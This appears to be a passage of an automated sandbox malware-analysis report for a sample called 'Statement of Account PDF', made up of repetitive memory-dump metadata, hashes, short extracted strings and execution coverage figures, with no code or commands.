                                                        • Opcode ID: 2fc8dec30cd997f912a647b27396318f1d90162e585ec4eb6b088241d7927bfb
                                                        • Instruction ID: d2f23aaa2ff3ac42e46cbe93971b6e028532749ba3ecc037201eb1acdb072631
                                                        • Opcode Fuzzy Hash: 2fc8dec30cd997f912a647b27396318f1d90162e585ec4eb6b088241d7927bfb
                                                        • Instruction Fuzzy Hash: AED01276605148CFD710AFE5E404ADDB779EB89312F0090A6E20ADB504CB3599158F60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$[V~*$]\`
                                                        • API String ID: 0-1849991408
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$]\`
                                                        • API String ID: 0-3978741314
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q
                                                        • API String ID: 0-1614139903
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q
                                                        • API String ID: 0-1614139903
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1710680268.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: true
                                                        • Associated: 00000000.00000002.1710403251.0000000007620000.00000004.08000000.00040000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7620000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1710680268.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: true
                                                        • Associated: 00000000.00000002.1710403251.0000000007620000.00000004.08000000.00040000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7620000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1710680268.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: true
                                                        • Associated: 00000000.00000002.1710403251.0000000007620000.00000004.08000000.00040000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7620000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93d64f390bd1bdc34a26077d7c5faed4305b25e9e0bc3d3dfbd68441a1bca60e
                                                        • Instruction ID: 09cf2d58430c4ceb902126214268338d7973aa6645ccbc65afa4c3507ccdf3c5
                                                        • Opcode Fuzzy Hash: 93d64f390bd1bdc34a26077d7c5faed4305b25e9e0bc3d3dfbd68441a1bca60e
                                                        • Instruction Fuzzy Hash: 22E1E9B4E042199FCB14DFA9C5809AEFBB2FF89304F248169E415AB356D731AD41CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707322732.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6cc0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e17624fe91fe577c0ddb56891db3da962316e0f0e95cc8d955e17d82f347021
                                                        • Instruction ID: c31e07358c473475b34b8426aed00b25facd42eb2a453614b200e39ab5f74d7b
                                                        • Opcode Fuzzy Hash: 1e17624fe91fe577c0ddb56891db3da962316e0f0e95cc8d955e17d82f347021
                                                        • Instruction Fuzzy Hash: 84A17270B002549FDB58ABBC841436F2AABAFC8354F14857C9049EB798DE389D4787A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6dc81984731bf48be11eabd74e3883061bc73e938ee7a001a98d48e28555e6f2
                                                        • Instruction ID: 8cda630ca8788d8f917c5420a90e0d97b6ab9baba685e1a9949bf87dc991af2a
                                                        • Opcode Fuzzy Hash: 6dc81984731bf48be11eabd74e3883061bc73e938ee7a001a98d48e28555e6f2
                                                        • Instruction Fuzzy Hash: CFD10435D20B5A8ACB10EF64D990A9DB7B1FFD5300F10D79AE1093B225EB706AC5CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3016c724987823d47b78175fe07621ce818145efd5230e424f47fe483c1ca78e
                                                        • Instruction ID: 654fe7eb238df7c889d89b2b62aae55c2bc4d8a44225c5e38fe11ca3ccb85bf2
                                                        • Opcode Fuzzy Hash: 3016c724987823d47b78175fe07621ce818145efd5230e424f47fe483c1ca78e
                                                        • Instruction Fuzzy Hash: 8381B0B4E15219DFCB44CFA9C68499EFBF2FF89210F14955AD415AB320D334AA42CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9bb6a96043514b56a2a3ae33af0627eb8a920c56af15855e84c3d945de29d51
                                                        • Instruction ID: bf4344e2bf329454942476188b735496ac4692962f6e87d7d2cd4dfbab9d505e
                                                        • Opcode Fuzzy Hash: e9bb6a96043514b56a2a3ae33af0627eb8a920c56af15855e84c3d945de29d51
                                                        • Instruction Fuzzy Hash: 1B61F1F0916A0AFBD744CF91E1C5299BFB2FB89300F20AC96C18AD7168E7349665CB14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d33b4b6b29e520638c25a6c45e1b5946b9d5e4b8f13ee9e9c4a0846dc9b933af
                                                        • Instruction ID: 44ddc0eebdb766a4e63cb7539bcd14d8efa4f1bcb4fdd9d2102b120c16823318
                                                        • Opcode Fuzzy Hash: d33b4b6b29e520638c25a6c45e1b5946b9d5e4b8f13ee9e9c4a0846dc9b933af
                                                        • Instruction Fuzzy Hash: AC5118B0E1520ADFCB08CFAAE4855EEFBF2EF89210F10942AD516B7754D7345A428F94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 81589702d7334d7f22c3354636921a0ca5105677997e60e82a4f154074c20b8f
                                                        • Instruction ID: b04f294f6528b85d0333bd1cc0292f3e123f7c130e83a02922cfc5c7da16611e
                                                        • Opcode Fuzzy Hash: 81589702d7334d7f22c3354636921a0ca5105677997e60e82a4f154074c20b8f
                                                        • Instruction Fuzzy Hash: D54191B1D056588FEB1DCF6B8C4069AFBF3AFC5310F19C1BAC458AA225EA3505468F50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 268bfa56d5f2cf327d5c8555af14f89ab39bf698adb4c7c9651da89cf605e5f8
                                                        • Instruction ID: e24c2635fc7ec1366616e9fb78e77fe98084a5c2bb6e9e8b19273e56ce95314e
                                                        • Opcode Fuzzy Hash: 268bfa56d5f2cf327d5c8555af14f89ab39bf698adb4c7c9651da89cf605e5f8
                                                        • Instruction Fuzzy Hash: E04153B1D016198BEB1CCF6B8D406DEFAF3AFC9301F18C1BA841CAA254EB7505968F50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 035cdeb1ea07da5b500d61188999c2b45741f7b408c6c66e4859048e6e8522af
                                                        • Instruction ID: 3b5daebe1b2148ad155bb05c8eaaf91ae179af9634a056b8c894951dde8bf791
                                                        • Opcode Fuzzy Hash: 035cdeb1ea07da5b500d61188999c2b45741f7b408c6c66e4859048e6e8522af
                                                        • Instruction Fuzzy Hash: EF41B2B0E0120AEBDB48CFAAC9815EEFBB2FB89300F24D52AD415A7214D7349A51CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43c93872bbef534c664faab4aadd14bbcfcf57daca15de1f5bca8ec841a996d6
                                                        • Instruction ID: c1870ab8cb6d648fb72928f3315648827ea575f0704974b23bbc7d8de695a042
                                                        • Opcode Fuzzy Hash: 43c93872bbef534c664faab4aadd14bbcfcf57daca15de1f5bca8ec841a996d6
                                                        • Instruction Fuzzy Hash: 8E317C7500C641CBC7922EAA88746957F60FF1336D7660B9AC1A48CCEBD762C0F2E394
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$B$B$Hbq
                                                        • API String ID: 0-1093311442
                                                        • Opcode ID: 26a665f24f1d6753a84d09ceb85a314657a6bde77e70eb32d279aca981f7010e
                                                        • Instruction ID: 3b16b221301b67600f421d9f8ddde5cf63f494b9536f8f81adfd3d3a58761f83
                                                        • Opcode Fuzzy Hash: 26a665f24f1d6753a84d09ceb85a314657a6bde77e70eb32d279aca981f7010e
                                                        • Instruction Fuzzy Hash: 8241EF71B002058FDB98CB7DC88446EBBBAFFC9214764456AE019CB3A1DB31DE06CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$$^q$$^q$$^q
                                                        • API String ID: 0-314989797
                                                        • Opcode ID: 5140a36ce36ce111bf787a838c64fd42def42cf2d5c7ab369358a1c0353046fd
                                                        • Instruction ID: 39ef19fc54279bc5bee500a7eda09aa1db02e86c7a330040d77f3f4bbce41ba2
                                                        • Opcode Fuzzy Hash: 5140a36ce36ce111bf787a838c64fd42def42cf2d5c7ab369358a1c0353046fd
                                                        • Instruction Fuzzy Hash: 42B1DF30B112048FDBA4DF65C840AAEB7F6BF89310F10856EE416DB395DB74DA86CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:12.4%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:55
                                                        Total number of Limit Nodes:5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: 51f107fd8d80e7fd6baf7d75af0f7c1381370b1fa7ba0d8a2ba90cec17ad17c4
                                                        • Instruction ID: 3a233b670639ef4df57febf89f11dc189f13b3073bdd723c730c47c46113c13c
                                                        • Opcode Fuzzy Hash: 51f107fd8d80e7fd6baf7d75af0f7c1381370b1fa7ba0d8a2ba90cec17ad17c4
                                                        • Instruction Fuzzy Hash: 4FD27B30E006098FCB64DF68C594A9DB7B6FF85300F6585A9D849AB764EB34ED85CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: 958b53ef18e4624487396350c93e56f8459dd90d63fa4c2ca8c897a94accbf4b
                                                        • Instruction ID: d618ace1ad98ba35e1886a5e6a333af73406cace007422aaa6f9410f5316b790
                                                        • Opcode Fuzzy Hash: 958b53ef18e4624487396350c93e56f8459dd90d63fa4c2ca8c897a94accbf4b
                                                        • Instruction Fuzzy Hash: 7A528030E102098FDF64DF68D5A07ADB7B6FB45310F218925E805EBB99DB35EC818B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: ca790eacdb5e0ddde326d621d8b06d5c5910ab6a53930da66575e78808c4a1fb
                                                        • Instruction ID: d3cd7c24f973b59c8cbef2cf7c897f642c2d5f294a18a74beebc32882ec9170f
                                                        • Opcode Fuzzy Hash: ca790eacdb5e0ddde326d621d8b06d5c5910ab6a53930da66575e78808c4a1fb
                                                        • Instruction Fuzzy Hash: D9029D30B002198FDB54DB64D594AAEB7F6FF84304F218929D809DB795DB31ED86CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: ebe7870b9e5fbfccdaa6538800bbe413c1ed14865491494c1849015338eee354
                                                        • Instruction ID: e5b43b1277ee6b06286fa03a6f96c7d49f31f721ea8d22cf3e79f2e8ca8c28bb
                                                        • Opcode Fuzzy Hash: ebe7870b9e5fbfccdaa6538800bbe413c1ed14865491494c1849015338eee354
                                                        • Instruction Fuzzy Hash: B122E135E002198FDF64DFA4C5846AEB7B6EF84310F228469D809EB786DB35DD42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe4aae2cef25beac88411af971d85e278c81e243e0abe4365944e57a38c3aa64
                                                        • Instruction ID: 1712fd17949bafad151a0d3e1b102940a09886d1de70a9c146fb7a7aae8cdf0e
                                                        • Opcode Fuzzy Hash: fe4aae2cef25beac88411af971d85e278c81e243e0abe4365944e57a38c3aa64
                                                        • Instruction Fuzzy Hash: ED62C134B002088FDF54DB68D594AADB7F6EF84314F658829E805EB764DB35ED86CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9df7d2c366d3df30d15c16b54450496768a007e1fad257f70226fd1f254133e
                                                        • Instruction ID: 3bfa469ba0165ccb996e249019e509312f51b9ff2d0c14fe748c270250fa7b6a
                                                        • Opcode Fuzzy Hash: e9df7d2c366d3df30d15c16b54450496768a007e1fad257f70226fd1f254133e
                                                        • Instruction Fuzzy Hash: 5E328034B10209DFDF54DB68D990AAEB7B6FB88314F218529E805EB754DB34EC42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-3823777903
                                                        • Opcode ID: 19a687485baf88fea4baf7d152b640d9eab0c7fd0d641a011d2813e21ae59cf6
                                                        • Instruction ID: 728e5915f3195fe03bd6fb04befb00a0b2495c42209a7e8c3f424e2fa85b03e5
                                                        • Opcode Fuzzy Hash: 19a687485baf88fea4baf7d152b640d9eab0c7fd0d641a011d2813e21ae59cf6
                                                        • Instruction Fuzzy Hash: 4DE17030E1020A8FDF65DF64D5946AEB7B6FF84304F218A29E8059B758DB34EC46CB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: d973a0eec89b09c939ee98dde12261856449cfcf04ee5cd7d65c9fe800a9f99e
                                                        • Instruction ID: 76e35bb303bb17525b84874cf5ab18e6812791a139bc1cf0a13deb4433b15ca0
                                                        • Opcode Fuzzy Hash: d973a0eec89b09c939ee98dde12261856449cfcf04ee5cd7d65c9fe800a9f99e
                                                        • Instruction Fuzzy Hash: 96913330F1021A9FDF54DF65D9507AEB3F6BFC8204F108565C809EB784EA70AD468B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend: Executed, Not Executed)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
